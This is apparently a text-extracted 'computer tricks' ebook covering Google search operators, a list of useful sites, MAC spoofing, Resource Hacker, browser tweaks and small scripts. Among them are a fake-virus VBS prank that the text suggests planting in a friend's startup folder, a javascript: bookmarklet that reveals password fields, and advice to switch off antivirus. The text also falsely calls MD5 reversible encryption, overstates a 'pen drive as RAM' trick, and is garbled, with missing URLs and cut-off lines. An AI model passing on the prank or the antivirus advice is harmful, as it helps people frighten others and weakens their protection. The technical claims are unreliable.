   The Boolean operators intitle and inurl work in Google directory, as does OR.
   Use the site: modifier when searching Google Images, at For example:
    dvd recorder
   Similar, using "" will only return results from .com domains.

   Google News ( has its own Boolean parameters. For example "intext"
    pulls terms from the body of a story.
   If you use the operator "source:" in Google News, you can pick specific archives. For
    example: heather mills source:daily_mail
   Using the "location:" filter enables you to return news from a chosen country. location:uk
    for example.
   Similarly, Google Blogsearch ( has its own syntax. You can search
    for a blog title, for example, using inblogtitle:
   The general search engine can get very specific indeed. Try movie: to look for movie
   The modifier film: works just as well!
   Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you
    when and where local films are showing.
   For a dedicated film search page, go to
   If you ticked "Remember this Location" when you searched for show times, the next time
    you can enter the name of a current film instead.
   Google really likes movies. Try typing director: The Dark Knight into the main search box.
   For cast lists, try cast: name_of_film
   The modifier music: followed by a band, song or album returns music reviews.
   Try searching for weather London – you'll get a full 4-day forecast.
   There's also a built-in dictionary. Try define: in the search box.
   Google stores the content of old sites. You can search this cache direct with the syntax
    keyword cache:site_url
   Alternatively, enter cache:site_url into Google's search box to be taken direct to the
    stored site.
   No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google
   Google's calculator converts measurements and understands natural language. Type in 14
    stones in kilos, for example.
   It does currency conversion too. Try 200 pounds in euros
   If you know the currency code you can type 200 GBP in EUR instead for more reliable
   And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.
   Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google
   You can personalise your Google experience by creating a Google account. Go to then click "Create Account".
   With a Google account there are lots more extras available. You'll get a free Gmail email
    account for one...
   With your Google account, you can also personalise your front page. Click "iGoogle" to add
    blog and site feeds.
   Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them
    with suitable site suggestions.
   iGoogle allows you to theme your page too. Click "Select Theme" to change the default
   Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day
    to night as you browse.
   Click "More" under "Try something new" to access a full list of Google sites and new
   "Custom Search" enables you to create a branded Google search for your own site.

   An active, useful service missing from the list is "Personalised Search" – but you can access
    it via when you're logged in.
   This page lists searches you have recently made – and is divided into categories. Clicking
    "pause" stops Google from recording your history.
   Click "Trends" to see the sites you visit most, the terms you enter most often and links
    you've clicked on!
   Personalised Search also includes a bookmark facility – which enables you to save
    bookmarks online and access them from anywhere.
   You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.
   Did you know you can search within your returned results? Scroll down to the bottom of
    the search results page to find the link.
   Search locally by appending your postcode to the end of query. For example Indian food
    BA1 2BW finds restaurants in Bath, with addresses and phone numbers!
   Looking for a map? Just add map to the end of your query, like this: Leeds map
   Google finds images just as easily and lists them at the top, when you add image to the
    end of your search.
   Google Image Search recognises faces... add &imgtype=face to the end of the returned
    URL in the location bar, then hit enter to filter out pictures that aren't people.
   Keeping an eye on stocks? Type stocks: followed by market ticker for the company and
    Google returns the data from Google Finance.
   Enter the carrier and flight number in Google's main search box to return flight tracking
   What time is it? Find out anywhere by typing time then the name of a place.
   You may have noticed Google suggests alternate spellings for search terms – that's the
    built in spell checker!
   You can invoke the spell checker directly by using spell: followed by your keyword.
   Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your
   Enter a statistics-based query like population of Britain into Google, and it will show you
    the answer at the top of its results.
   If your search has none-English results, click "Translate this Page" to see it in English.
   You can search foreign sites specifically by clicking "Language Tools", then choosing which
    countries sites to translate your query to.
   Other features on the language tools page include a translator for blocks of text you can
    type or cut and paste.
   There's also a box that you can enter a direct URL into, translating to the chosen
   Near the language tools link, you'll see the "Search Preferences". This handy page is full of
    secret functionality.
   You can specify which languages Google returns results in, ticking as many (or few) boxes
    as you like.
   Google's Safe Search protects you from explicit sexual content. You can choose to filter
    results more stringently or switch it off completely.
   Google's default of 10 results a page can be increased to up to 100 in Search Preferences,
   You can also set Google to open your search results in a new window.
   Want to see what others are searching for or improve your page rank? Go to
   Another useful, experimental search can be found at –
    where you can find the hottest search terms.

      To compare the performance of two or more terms, enter them into the trends search
       box separated by commas.
      Fancy searching Google in Klingon? Go to
      Perhaps the Swedish chef from the muppets is your role model instead? Check
      Type answer to life, the universe and everything into Google. You may be surprised by the
      It will also tell you the number of horns on a unicorn.

 Using Pendrive(USB) as RAM:
      Connect your pen drive to your PC [pen drive should be at least 1 GB or if you having 4 GB
       or then its better]
      Allow PC what he is supposed to do,let system to detect pen drive.
      After your PC finished with its detection work,you have to do some little
      Right click on the My Computer and select the properties
      Goto advanced and then performance setting then advanced then
      Select pen drive and click on custom size " Check the value of space available "
      Enter the same in the Initial and the Max columns
      " You just used the memory of the PenDrive as a Virtual Memory "
      Now restart your pc and enjoy your fast and super system

 Access blocked sites:
You can use these proxy to open blocked sites.
Online proxies:



***Some proxies in the above list may not work, so
Another list of proxies:

 List All files of a folder (PHP):
Do you want to show your all files of a folder? If yes, then here is a solution. Create a php file,
with any name, for example, list.php, now copy and paste the below code to that file and save
it, then upload it to your website. You may also add the code to your any existing php file on
your site.
echo "<title>Files and folder Listing | HackAlone Technologies</title>";
function ListFolder($path)
   //using the opendir function
   $dir_handle = @opendir($path) or die("Unable to open $path or Folder does not exists!");

  //Leave only the lastest folder name
  $dirname = end(explode("/", $path));

  //display the target folder.
  echo ("<li>$dirname\n");
  echo "<ul>\n";
  while (false !== ($file = readdir($dir_handle)))

         if($file!="." && $file!="..")
            if (is_dir($path."/".$file))
                //Display a list of sub folders.
                //Display a list of files.
                echo "<li>$file</li>";
     echo "</ul>\n";
     echo "</li>\n";

     //closing the directory

<script language="JavaScript" type="text/javascript">
  bullets : 'plusminus',
  icons : true,
  struct : false,
  objId : 'FolderView'
<ul class="dmxtree" id="FolderView">

ListFolder("foldertolist"); //Change here only!
Change Upload below with the folder name that you want to list. Repeat the above line
ListFolder("foldertolist "); as much as you want, this can be done if you have to list more than
one folder.

You just have to change “foldertolist” with the folder name that you want to list. See a little
above in the code, instructions are also written in the code. Now, it will list all files of your
desired folder in an excellent way. Repeat the above line ListFolder("foldertolist "); as much as
you want, this can be done if you have to list more than one folder.

 101 useful sites:

Here is a list of useful sites. There are a lot of useful sites available on the internet, but this is a
list of 101 useful sites, only.

01. – record movies of your desktop and send them straight to YouTube.

02. – for capturing full length screenshots of web pages.

03. – shorten long URLs and convert URLs into QR codes.

04. – find the original URLs that’s hiding behind a short URLs.

05. – know more than just the local time of a city

06. – copy-paste special characters that aren’t on your keyboard.

07. – a better search engine for twitter.

08. – search iOS apps without launching iTunes.

09. – the best place to find icons of all sizes.

10. – download templates, clipart and images for your Office documents.

11. – everything you wanted to know about a website.

12. – scan any suspicious file or email attachment for viruses.

13. – gets answers directly without searching – see more wolfram tips.

14. – print web pages without the clutter.

15. – reformats news articles and blog content as a newspaper.

16. – when you wish to share a NSFW page but with a warning.

17. – a simple online timer for your daily needs.

18. – if a site is down due to heavy traffic, try accessing it through coral CDN.

19. – pick random numbers, flip coins, and more.

20. – check the trust level of any website – example.

21. – Preview PDFs and Presentations directly in the browser.

22. – simultaneously upload videos to YouTube and other video sites.

23. – the best place for searching web videos.

24. – share you email address online without worrying about spam.

25. – now get read receipts for your email.

26. – visualize and compare the size of any product.

27. – quickly determine the font name from an image.

28. – a good collection of fonts – free for personal and commercial use.

29. – find data hidden in your photographs – see more EXIF tools.

30. – this is like an online version of Google Googles.

31. – helps you search domains across all TLDs.

32. – your favorite blogs delivered as PDFs.

33. – share you screen with anyone over the web.

34. – recognize text from scanned PDFs and images – see other OCR tools.

35. – Track flight status at airports worldwide.

36. – for sharing really big files online.

37. – a temporary online clipboard for your text and code snippets.

38. – check your writing for spelling or grammatical errors.

39. – easily highlight the important parts of a web page.

40. – work on the same document with multiple people.

41. – planning an event? find a date that works for all.

42. – a less confusing view of the world time zones.

43. – you’ll need this when your bookmarked web pages are deleted.

44. – the perfect tool for measuring your site performance online.

45. – chat with your buddies on Skype, Facebook, Google Talk, etc. from one place.

46. – translate web pages, PDFs and Office documents.

47. – sit back and enjoy YouTube videos in full-screen mode.

48. – discover new sites that are similar to what you like already.

49. – quick summarize long pieces of text with tag clouds.

50. – create mind-maps, brainstorm ideas in the browser.

51. – get color ideas, also extract colors from photographs.

52. – setup quick reminders via email itself.

53. – when your friends are too lazy to use Google on their own.

54. – generate temporary email aliases, better than disposable email.

55. – lets you can quickly edit PDFs in the browser itself.

56. – send an online fax for free – see more fax services.

57. – get RSS feeds as an email newsletter.

58. – transfer files without uploading to a server.

59. – setup a private chat room in micro-seconds.

60. – create text notes that will self-destruct after being read.

61. – live flight tracking service for airports worldwide.

62. – track the status of any shipment on Google Maps – alternative.

63. – when you need to raise funds online for an event or a cause.

64. – is your favourite site really offline?

65. – this website can be used as an example in documentation.

66. – find the web host of any website.

67. – found something on Google but can’t remember it now?

68. – find whether a photo is real or a photoshopped one.

69. – get word meanings, pronunciations and usage examples.

70. – find definitions of slangs and informal words.

71. – consult this site before choosing a seat for your next flight.

72. – download stock images absolutely free.

73. – chat with your buddies on Skype, Facebook, Google Talk, etc. from one place.

74. – unzip your compressed files online.

75. – record your voice with a click. The 101 Most Useful Websites 4

76. – create custom Google Maps easily.

77. – never miss another Internet meme or viral video.

78. – quickly setup email reminders for important events.

79. – prevent your ISP and boss from reading your search queries.

80. – you can ask or answer personal questions here.

81. – find if that email offer you received is real or just another scam.

82. – master touch-typing with these practice sessions.

83. – send video emails to anyone using your web cam.

84. – quickly send a file to someone, they can even preview it before downloading.

85. – create timelines with audio, video and images.

86. – make a movie out of your images, audio and video clips.

87. – an online audio editor that lets you record and remix audio clip.

88. – print music sheets, write your own music online (review).

89. – create a temporary web page that self-destruct.

90. – when you need to find the name of a song.

91. – design from scratch or re-model your home in 3d.

92. – use email on your phone to find sports scores, read Wikipedia, etc.

93. – a beautiful to-do app that resembles a paper dairy.

94. – broadcast events live over the web, including your desktop screen.

95. – automatically find perfectly-sized wallpapers for mobiles.

96. – preserve complete web pages with all the formatting.

97. – your virtual whiteboard.

98. – send an email without using your own account.

99. – an excellent layer-based online image editor.

100. – create flowcharts, network diagrams, sitemaps, etc.

101. – Get your Facebook and Twitter streams in your inbox.

 Browser inside browser:
Yes, I am right, you can get another browser inside browser. Its for firefox. Run firefox, copy and
paste the below code in the URL bar and hit enter.

To remove that inside browser, simply restart your firefox.

 Test your antivirus is working or not:
Here is a simple and safe way to check your antivirus is working or not and you are protected or
not. Open notepad and copy and paste the below code in there. Now, save it with any name and
any extension, for example, test.txt or test.bat or anything else. If your antivirus is working,
then it will get detected as virus immediately, usually as “EICAR test file”. But, if not, then your
antivirus is not working, get a new and better one.

 Scare your friends with a fake virus
Open notepad and copy and paste the below code in there and save it as Virus.VBS, now you just
have to send it to your friend, and when he/she will double click on it, he will see a message,
“Warning a virus has been detected on your PC. Press YES to format your hard disk now or press
NO to format your hard disk after system reboot”. To make it more effective, paste it in the
startup folder of your friend, if you have access to your friend system. Clicking Yes or No will do
nothing, because it is not a virus. It is 100% safe to run.
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk
now or press NO to format your hard disk after system reboot",20,"Warning")

 Change your MAC address(MAC
  address spoofing):
MAC(Media access control) address is a physical permanent address alloted to you by their
company. But you may change modify it or we may say spoofing MAC address. Changing MAC
address in useful in privacy if connecting to Wi-Fi hotspot. However, some internet services force
their user to use specific MAC address, and if you will change it, the service wont work anymore.

After restart, your MAC address should be restored to your original one. A MAC address is 48bits
in length.

Under MAC OS, the MAC address can be altered in a fashion similar to the Linux and FreeBSD
sudo ifconfig en0 lladdr 00:01:02:03:04:05
sudo ifconfig en0 ether 00:01:02:03:04:05
Where 00:01:02:03:04:05 is the new desired MAC address.
This must be done as a superuser and only works for the computer’s ethernet card.

Changing MAC address in windows is so simple by using a software called “Win7 MAC Address
Just download and install “Win7 MAC Address Changer” from the above download link. And, then
run it. It will show your current MAC address in a textbox with Current MAC.
There are mainly 4 options available:
1.Choose an Adapter.
2.Select Your Operating System.
3.Enter a new MAC or Just Hit Randomize Button.
By settings, “Win7 MAC Address Changer” reads your computer and select option 1,2
automatically. But, if not or modification is required, then you have to select them.
In option 3, enter desired MAC address or just click on Randomize Button, it will generate a
random MAC address for you. Now, just click on Change(Option 4). And, its changed!

 Generate and Read QR code on your
QR Code (abbreviated from Quick Response Code) is the trademark for a type of matrix barcode
(or two-dimensional code) first designed for the automotive industry. More recently, the system
has become popular outside the industry due to its fast readability and large storage capacity
compared to standard UPC barcodes. The code consists of black modules (square dots) arranged in
a square pattern on a white background. The information encoded can be made up of four
standardized kinds ("modes") of data (numeric, alphanumeric, byte/binary, Kanji), or through
supported extensions, virtually any kind of data.
In short, QR code can record text data(URL, Text, Email, Phone number, SMS, Contact details,

How to generate?:
We recommend you to use this site to generate your QR code. Its free
and online. There are several options, like URL, Text, Phone Number, SMS and Contact. Just
select your desired option. We recommend to use Text. Now, write the text that you want to add

in your QR code, for example, I write “Hackalone Technologies” and then click on
Generate(Free). A QR code will get generated left side of the text box, now right click on it and
save it on your desktop. Now, you have your own QR code, you may share it with anyone, to you
friends, family and you may also host it on your site or blog.

How to read?:
There are so many online and offline programs are available, but we will use “CodeTwo QR Code
Desktop Reader”, its small and free. Its offline, and need to be installed on your system first.


Download it and install it on your system. Go to All programs and run Codetwo QR code desktop
reader. There are three options, “From file”, “From screen” and “Help”.
Click on “From file” and locate the QR code image file. It will show its text in a textbox located
below with name, “Decoded text”. Now, you have succcessfully decoded a QR Code. There are
two other options, namely “Copy to clipboard” and “Save to file”. “Copy to clipboard” will copy
the decoded text to your clipboard and will allow you to paste it anywhere in a document and
“Save to file” will save the decoded file to a text file or CSV file as selected by you.

 Resource Hacker Use:
Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract
resources in 32bit & 64bit Windows executables and resource files (*.res). It incorporates an
internal resource script compiler and decompiler and works on all (Win95 - Win7) Windows
operating systems. In short, you can alter any software.
Download and install resource hacker on your system. Some antivirus may detect it as virus, its
just a false positive, resource hacker is 100% safe to use. If your antivirus detect it as virus,
simply turn off your antivirus and use resource hacker.
After installation, run resource hacker through its installation folder or if you have desktop
Default installation folder of resource hacker is C:\Program Files\Resource Hacker, to get fast
access, visit the folder, right click on ResHacker.exe and send it to desktop(It will create
You will find some options in it, i.e. file, edit, view, action and help.
I am gonna edit/modify winrar exe file. I have winrar installed in my pc, so I will visit C:\Program
Files\WinRAR and will copy WinRAR.exe to desktop(Note: I am not sending it to desktop, if I do
so, a shortcut of WinnRAR.exe will get created on desktop, but we need the executable file not
the shortcut).
If you don’t have winrar, then get it free from here:
After copy, go to file>open option in resource hacker and WinRAR.exe or you may just drag
WinRAR.exe to the resource hacker window.
Now, you will find several option there, like cursor, bitmap, icon, menu, dialog, etc.
You may edit any option you want. These options contain different part information of the
program. I am gonna edit dialog, so I clicked on dialog, now on ABOUTRARDLG, then on 1033.
A pop-up came out, this is the about window of winrar! You will find it same as winrar about
window. Suppose you have to edit Alexander Roshal from copyright window to your name, say
Hackalone, click on Alexander Roshal and now right click and then edit control, you will find

Alexander Roshal in Caption: text box, simply change it with desired name and hit ok. Now, do
the same steps to change anything in that window, you may edit, delete, or add anything in
there. Using options available when you right click. If you have close the dialog and want to see
it again, there is an option, “Show dialog”, just click on it to see the window again.
After desired modification, click on “Compile script” option first and then go to file>save or
It will create create one new file, WinRAR_original.exe which will be unmodified and will save
changes to WinRAR.exe, to see changes, just run WinRAR.exe, go to help>about winrar, and see
the changes. Now, you may use it after copying it back to winrar installation folder.
Please note: You can modify any program not only winrar. I just tought it using winrar, you may
use any program that you want, like ccleaner, firefox, google chrome, etc. But, options will be
differ. In dialog option, you will not find ABOUTRARDLG, but you will find a similar option to it.
Modifying a software may alter its working if not modified correctly. Also, don’t
host/upload/share your modified files online or with anyone. Its illegal to do so. You may modify
it just for you.

 Drive Defrag:
Drive defragging is method of optimizing files and increasing your system file. This method really
speed up your system. There are so main drive defraging software available on the internet. But,
I recommend you “Smart defrag”, its fast, easy and free. It’s the best freeware software
available to defrag your system.


 System Cleaner:
System cleaner maily cleans your system. It deletes old and unnecessary files, temp folder, old
prefetch data, unused/invalid data files, etc. A free and powerful cleaner is “CCleaner”. It help
you in maintaining your system. It increase your system performance in just one click.


 Image File Mounting:
Image files, not jpeg or png, I am talking about .ISO or .NRG, etc. These files are very useful in
data storing. These files seems to be safe a little more from viruses, because a majority of
viruses are designed to harm .exe files. Suppose, you have a DVD of a movie, you inserted it into
your system and made an .iso file using NERO or any other software, like astroburn. If you want
to watch the movie, then you have two options. First one is to write it on another DVD and then
play it on your system and other other is to extract its data using a program that can extract .iso
file. Well, writing/burning DVD will be a little difficult task, and extracting a 4.7GB(or even
large) will take a lot of time, may be half or one hour. But using an image file mounting

software, you can watch that movie without burning or extracting. The best free image mounting
software is “Daemon Tools Lite”. Download it from the below link, install it as free user and
check associate files option while installing. Now, double click on any image file or open with
daemon tools lite, it will get mounted to a virtual drive create by daemon tools after installing.
Now, you can watch it. Its just like a DVD in your DVD drive. You can use daemon tools lite to
handle any data, like movie, software, games, etc.


 Screen Recorder:
Do you ever tried to record your activity on your system? Are you able to record your activity on
your system in High Defination? Which program do you use? We recommend you to use ”Zd soft
screen recorder”. It can record your any activity and also your gaming in HD. So, use it to record
your own HD videos. You can upload them later to video sharing sites, like youtube.


 Burning videos to CD/DVD to make it
  playable on CD/DVD players:
Which program do you use to burn your videos to DVD and also to make it playable on CD/DVD
players? Are you able to do it? Can you make a video DVD playable on DVD players? We
recommend “VSO convertxtodvd”. It’s the best video burning software that also converts your
video to proper format before burning. You just have to add the videos that you want to burn it
to your DVD and all done. You may burn any number of videos, it self adjusts the video quality
making sure to get a good print. However, adding a large number of big videos will result in low
quality of created DVD.


 Converting Videos:
You always convert your videos to proper format to make them playable on other devices like
mobile phones. We recommend “Xilisoft video converter” for this. You can convert any video file

to any format using this. This is the best video converter available online. It converts in very
good video and audio quality.


 Burning files:
We always to burn files, such as image files, video files, application files, audio files, etc. We
recommend “Nero”, it’s the best burning tool available online. It burns every data to CD or DVD.
It also provides image file (.iso, .nrg, etc) burning software using Nero burning ROM.


 Protecting data with password(1):
You can use “Folder lock” to lock your files. Using that software you can lock your any data using
password, and its highly unbreakable. You have to just download and install. If you use this
method, your data will get copied or moved depending on the folder lock settings, and then it
will get encrypted. That’s mean you can get back your data if you lost your password.


 Protecting data with password(2):
You can also protect your files using “Protected Folder”. This will not copy or move your data, it
will just lock it in your own operating system. Well, to get back your data, you need to remember
your password that you filled in the protected folder, if you lose it then you can get back your
data after formatting your system. Using “Folder lock” is more powerful way to lock your data.


 Lock your USB with password:
You can protect your pendrive/usb data using “USB secure”. This will install a program into your
USB that will allow user to view files only if valid password is provided. To install this, download
from the below link, run it on your system, it will ask you for your USB location, and also a new
password for USB, locate your USB and finish installation. Now, your USB is locked/protected
with a password. Whenever you will insert your USB, it will ask for password to browse files of
that USB.


 Tutorials:

 Anti-iframe [Reject iframe call]
Do you want to block your site to be viewed in iframe by a site? Do you want to reject iframe call
[<iframe src=""></iframe>]. Some hackers may use this trick for hacking
purpose. And some may use/display your site content via iframe and can take benefits from your
site. Well, with this tutorial you can block this misuse of this tutorial. We will do it by using

What is javascript?
JavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-
class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and
functional programming styles.

It is a powerful language/tool in this internet world, almost everyone uses it. Billions of websites
are using javascript including our site.
So, this method is seems to be 100% working [This method will not work if the user has disabled
javascript in his browser, a very low chance]. The best of all is, it is compatible with any
programming or basic language, including html, htm, shtml, php, asp, etc.


<script>if(self != top) { top.location = self.location; }</script>

Implementing/Adding the code in files other than .js:

Just copy the complete above code with script tag, dont edit it, and paste in your webpage
anywhere you want. [After <head> Recommended].
Save it and its all done from your side.

Implementing/Adding the code .js file:

Remove script tag from the code, i.e. paste if(self != top) { top.location = self.location; } in .js
[Javascript file] and then save it.

    Now, when someone will call your site via an iframe, it will get redirected to the called link. For
    exanmple, if i will call via an iframe [<iframe
    src=""><iframe>], i will get redirected to

    This will also prevent your site from many attacks as well.

     Add Images to Google Earth
    As the name says, add your images to Google Earth, in just a few simple steps.
    Yes, its so easy.

    1.You must have the original image of the location or object.

    First of all, visit this url
    Then, signup there, a google account will work, because panoramio is a part of google.
    Now, login and upload your images there, you can upload upto 10 images at a time, and then give
    title and description to each image.
    After that, your images will not be published in Google Earth, you have to do an important work
    These below steps are important to publish your images in google earth.

   Open each image one by one.
   You will find an option, "Map this image" on your right screen.
   Click on it.
   Search the place by typing keywords, like India gate, new delhi, etc.
   It will show a map with india gate.
   Place the marker where you wanna show your image in google earth.
   And click on save.
   All done from your part.
   Now, google earth team will review these images and will approve/disapprove it.
   Reviewing may take some time, normal time is 2 or 3 days.
   And, if they approve it, your images will be published at Google Earth.

    Important Notes:

   Your images will be published to Google Earth only if the Google Earth team approve it.
   After approval your images may take few days to show in Google Earth, because panoramio takes
    some time to transfer images to Google Earth, the normal time of transfer after approval is 10 to
    20 days.

    Things to remember:

   Give suitable and perfect titles in english language.
   Add a good description of each images.
   MUST map it or your images will not be reviewed and selected.

    Some Important status by panoramio and its meaning:

    This photo is selected for Google Earth.
    This status means your image has been selected for Google Earth, and will be published as soon
    as possible.
    This photo has not yet been reviewed.
    This status means your image is still waiting for approval by Google Earth Team.
    This photo has not been selected for Google Earth.
    This status means, your image has been disapproved, and wont be published at Google Earth.

    Now, you know everything about adding images to google earth.

     Asterisk Password Viewer [Updated]
    There is just a javascript code for that which will show password of a page.

    How to use?
    Copy the below code:

    (function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0;
    i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s)
    alert("Passwords in forms on this page []:\n\n" + s); else alert("There are no
    passwords in forms on this page [].");})();
    Now go to the page that is containing password.
    Type javascript: then paste the copied code.[Dont give space after javascript:]
    Hit enter and a pop-up alert will come containing the password of that page.

     Encryption and Decryption
    We are going to discuss about Md5 Encryption and Decryption, with its help you can Encrypt any
    message and it will give you a hash and if you will give the hash to your friend or any one your
    he/she can Decrypt it and get message.

    Md5 Encrypter
    Md5 Decryprer

    Just go to the encrypter and enter the message now click on encrypt to get the hash.

    Now, go to decrypter and paste the hash, hit decrypt and get the real message.

Md5 hash look like this:

Btw, it is not best at safety, someone may get access to your hash and can know the secret

You can use program to encrypt your data, like you can use winrar to encrypt and lock your data.

 Browser's War-Which one is better?
Do you ever think, which browser is better? Like if you are using Google Chrome, then do you
think Firefox is better, and when you use Firefox, do you think Google Chrome is better?
Main browsers:-
1.Google Chrome
4.Internet Explorer

From the above, we will discuss about Google Chrome and Firefox only, they are at top, and best.
Google Chrome was released on September 2, 2008 and it is an excellent browser in terms of
page load speed, look, launching speed, features, etc.
Firefox was released on November 9, 2004 and it has a good reputation and also similar features
like chrome.
Both have some defects and some benefits.
Like if you will install an add-on in firefox, then you have to restart the whole browser, but if
you do this in google chrome, then there is no need to restart chrome.
If you are a normal user, then it very hard for you to detect this difference, chrome helps web
developers to see a function or code, then the programmer can understand how a script is
Chrome has a good view-source capability than firefox.
Chrome has less crashes then firefox and chrome also shows very rare not responding but firefox
get hanged very easily.
But, firefox loads website contents correctly, but chrome may ignore some contents and damages
the layout and working capacity of the website. Firefox offers a wide varity of add-on and it also
provide element detection which helps programmers.
We will not discuss about opera, saffari, or internet explorer, because there are so weak
browsers and doesn't support all script and features.
So, i would like to recommend you to use two browsers, first one is Google Chrome & second is
Use both chrome and firefox as you need.

To download anyone from them, just google and get it. Chrome has already surpassed firefox in
the few months as reported by monitoring website. Do you who is at top of uses? Internet
explorer! Its because many governmental websites only support internet explorer thats why its at

top. Well, internet explorer 10(With windows 8) is going to change the reputation of internet
explorer, i have tried it and its contains a really large improvements, now it works with all
websites and does not hang.

 User Agent Switcher
User Agent Switcher refers to changing your default browser user agent to your custom user
agent in simple way.

For Mozilla Firefox:

Requirements: Mozilla Firefox(Any version)
Visit this url Firefox add-on and click on "Add to firefox" and then install this add-on, it may ask
for restart of your browser, then just do it. Now, you are ready to change your user agent.

How to change your user agent?
After installation of this add-on and restart of your browser do these steps:
*Go to Menu(press alt to highlight this), select tools, click on "default user agent" and select any
user agent given there, you may create your own custom user agent by clicking on "edit user
agent". Create user agent like your name or type Hackalone and after that activate the user
agent via same process.

For Google Chrome:

Requirements: Google Chrome(Any Version)


chrome.exe --user-agent="User Agent String"

Create a shortcut of Google Chrome executable file on your Desktop.(If you already have, then
ignore this step)
Right click on the shortcut and select Properties, go to target field.
Add the string above with your own custom user agent. Make sure there a one space and double
hyphens "--" after chrome.exe.
Click OK to close.
For example: If you target field contains this line


Then change it to
C:\Users\H4CK3R\AppData\Local\Google\Chrome\Application\chrome.exe --user-agent="User Agent

Please note that H4CK3R from the lines will differ, and will change with your computer name.
Now, run it, user agent changed!!!

Warning:Some sites like Google may break functionality after checking your custom user

 Chrome Update & Back To Older
Google Chrome gets updated quite very often. One may not have noticed it because Google
automatically updates and installs the latest stable version of Chrome. Even Firefox is trying to
play the catch up game but, still one don?t think they will ever catch up when Chrome is already
at version 18 now and Firefox is only at v10 [Till date 15-Feb-2012].

Whatever the case is, have anyone ever wondered what goes on when Google Chrome is being
updated? Will the new version overwrite the old version? Or does the old version gets uninstalled
automatically? The answer is the previous version of Google Chrome are kept and not removed. If
you check the folder where Google Chrome is installed, you would noticed that there are 2
folders with different version numbers and two chrome executable files (chrome.exe and

Obviously chrome.exe with the newer version number are the most updated Chrome while
old_chrome.exe and the folder with older version number is obsolete. One probable reason that
the old version is still kept because of rollback purposes but the official Chrome FAQ page
mentioned that they don?t recommend you to roll back Google Chrome to a previous version.

The old version of Chrome takes up about 80MB space from your hard drive and it is actually safe
to remove the redundant old Chrome files since they are not being used at all. If you want to
manually delete the outdated Chrome from your computer, here is how you do it. First you need
to enable show hidden files, folders and drive from Control Panel > Folder Options > View tab.
Then open the following location with Windows Explorer.

On Windows XP: C:\Documents and Settings\[user]\Local Settings\Application

On Windows Vista/7: C:\Users\[user]\AppData\Local\Google\Chrome\Application

Delete old_chrome.exe file and the folder that shows an older version number. Alternatively, you
can use a free and portable tool called OldChromeRemover which automatically detects the
obsolete versions of Google Chrome and deletes it when the user press the Y button on the
keyboard. OldChromeRemover requires Microsoft .NET Framework 3.5 and also Run as
Administrator to work.

Download OldChromeRemover :

 Dislike multiple facebook pages quickly
Did you like a lot of pages and want to unlike them quickly [All or few]? We have a solution for
you. Just follow this tutorial to unlike the unwanted pages [Dont unlike ours... ;) ].

Login to your facebook account.
Go to your profile. [See the top right side, you will see your name there, click on name to go to
your profile].

You will see an option on that page, "Likes". Click on it

Now, you will see an option there, "Edit". Click on it.

Now, scroll down a little and look up for an option, "Other Pages you like", click on it.

A box will pop-up containing your all liked page with an option "Unlike" infront of every page.
Just click on "Unlike" located after that page you want to unlike.

As i already said, "Please dont try this with our facebook page..." :)

 Disable Facebook Timeline
We have noticed that, a lot of facebook users are not liking the new timeline and they
continously asked us "How to disable it?". So, after thinking a lot, we finally found a way!
Facebook timeline is not compatible with older outdated browsers. So, here we go. To disable
timeline, just follow the given instructions carefully.

Simplest Way to disable timeline for profile:

Just visit this url, and scroll down a little. You will see four
browser logo, click on your browser(If you are using chrome, then click on chrome logo and if you
are using firefox, then click on firefox logo.). This is available for Mozilla firefox, Google
Chrome, Internet Explorer and Safari(Safari is in progress-Date: 15-March-2012). Now, install the
add-on/extension. And, your timeline is now disabled. To enable timeline, click on the new icon
of timeline in chrome after url bar and then click on "Status: Timeline Remove", clicking will
enable timeline. And to disable timeline again, click on that "Status: ..." button again.

Or follow below steps:

This is for Google Chrome and Mozilla Firefox.

You can disable timeline by changing your user agent. We are using latest browser but we will
change the user agent to an outdated version and timeline will be disable. First please read this
tutorials: User Agent Switcher, to know about how to change the user agent. You must read
"Change User Agent" tutorial to follow this tutorial. Now, proceed after reading that tutorial.
For Google Chrome
Use this user agent:
For Windows 7:
--user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
For Windows xp:
--user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

    Now, change your user agent as i already tought in the "Change User Agent" tutorial. Open
    facebook, login and enjoy. Timeline is now disabled. Ignore any message about upgrading your
    browser. To get back your real user agent, simply delete the added lines from the shortcut.

    For Mozilla Firefox
    Install "User Agent Switcher" as I listed in "Change User Agent" tutorial. And, then fill up this user
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    To get back your real user agent, simply uninstall that add-on.

    I just tried on windows 7 and windows xp, if you test it on another OS then please let me know.
    Please write comment below confirming this tutorial.

    ***Change useragent tutorial is available just a little above this tutorial, scroll up to lookup.

     Extract name from many files at once
    Suppose you have 5 images with different names in a folder and you want to write their name in
    a text file so you can send it to your friend. What you will do? A simple user will just rename the
    file, will copy its name and then he will paste it in a text file and will repeat this step for every
    file. He will surely get success! But, what if you have thousands of file? Will you follow this step?
    No and never. Here is a tutorial which will help you do this in just an easy click.

   Open Run(Win+R or All programs>Accessories>Run) and type notepad then hit enter.
   Now copy and paste the below code in the notepad.


    @echo off
    dir /B /O > list.txt
    echo. >> list.txt | echo. >> list.txt | echo. >> list.txt | echo Hackalone Technologies
    (>> list.txt

   Now save it with any name but add .bat extension to it. Like save it with name list.bat . Dont
    ever try to modify the above code otherwise it may cause file damages.
   Now, you have a bat file that will name your all file and folder available in the same

    How to use?
   Simply copy the created bat file in the folder which contains your all files from where you want
    to extract names.
   Dobule click on your created bat file.

   This will create a text in the same directory/folder with name "list.txt" which will contain your
    all file and folder names available in the directory/folder.

     Edit the Right Click Menu in Windows
      (Via Regedit)
